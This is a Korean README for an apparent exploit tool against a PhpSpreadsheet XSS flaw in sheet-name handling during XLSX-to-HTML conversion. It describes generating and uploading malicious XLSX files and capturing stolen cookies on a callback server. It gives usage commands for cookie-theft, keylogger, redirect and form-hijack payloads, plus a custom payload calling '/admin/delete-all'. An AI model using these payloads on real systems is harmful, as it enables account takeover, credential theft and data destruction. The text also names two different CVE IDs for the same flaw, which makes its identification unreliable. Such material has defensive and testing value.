
이것은 CVE-2024-47875 PhpSpreadsheet XSS Vuln에 대한 PoC/Exploit입니다.
이는 CVE-2025-22131에 대한 PoC입니다. PhpSpreadsheet 버전 2.2.2, 2.1.2, 1.29.4 이전 버전에서 발생하는 XSS(크로스 사이트 스크립팅) 취약점입니다. 이 취약점은 generateNavigation() 함수에 존재하며, XLSX를 HTML로 변환할 때 시트 이름을 살균 처리하지 않아 악성 JavaScript 주입이 가능합니다.
CVE ID: CVE-2024-47875
GitHub Advisory: GHSA-79xx-vf93-p7cx
영향받는 버전: PhpSpreadsheet < 2.2.2, < 2.1.2, < 1.29.4
작성자: Roj
라이선스: MIT
저장소: PoC Repo
📄 사용자 정의 XSS 페이로드가 포함된 악성 XLSX 파일 생성
🛠️ 다양한 페이로드 유형 지원:
🌐 익스플로잇 콜백을 캡처하는 내장 HTTP 서버
⬆️ 악성 XLSX 파일을 대상 엔드포인트에 업로드
💾 캡처된 데이터(예: 쿠키)를 JSON 파일로 저장
🎨 가독성을 높인 컬러 출력
🔍 디버깅을 위한 상세 로깅
python exploit.py -h
🚀 사용 예시:
# 기본 쿠키 탈취 공격
python3 exploit.py http://target.htb 10.10.16.50
# 사용자 정의 업로드 엔드포인트
python3 exploit.py http://app.htb 10.10.16.50 -e /api/file-upload
# 다른 페이로드 유형
python3 exploit.py http://target.com 10.10.16.50 -p keylogger
python3 exploit.py http://target.com 10.10.16.50 -p redirect
python3 exploit.py http://target.com 10.10.16.50 -p form_hijack
# 사용자 정의 XSS 페이로드
python3 exploit.py http://target.com 10.10.16.50 --custom "<script>fetch('/admin/delete-all')</script>"
피드백을 받고 싶습니다. 모두 행운을 빕니다.